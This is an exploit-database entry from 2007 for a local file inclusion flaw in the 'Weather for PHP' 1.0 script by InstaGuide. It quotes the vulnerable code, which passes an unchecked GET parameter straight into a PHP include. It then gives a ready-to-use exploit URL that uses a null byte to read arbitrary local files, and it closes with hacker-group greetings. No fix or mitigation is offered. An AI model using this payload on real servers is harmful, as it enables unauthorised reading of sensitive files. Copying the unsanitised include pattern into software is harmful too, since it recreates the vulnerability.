InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion
Author: h4ck3r
type: webapps
platform: php
port:
date_added: 2007-10-21
date_updated:
verified: 1
codes: OSVDB-38136;CVE-2007-5674
tags:
aliases:
screenshot_url:
application_url:
Weather for PHP <= (PageName) Local File Include Vulnerability
Script : Weather for PHP
Version : 1.0
Download : http://www.instaguide.com/download/weather_free.zip
AUTHOR : BorN To K!LL
Vuln Code :
$PageName = $_GET['PageName']; //// this is one ... :)
include("includes/content/$PageName.php") //// this is two ... :)
Exploit :
[path]/index.php?PageName[Local File]%00
Greetings :
str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ...
BorN To K!LL <> Dr.2 = 4ever .... =D
# milw0rm.com [2007-10-22]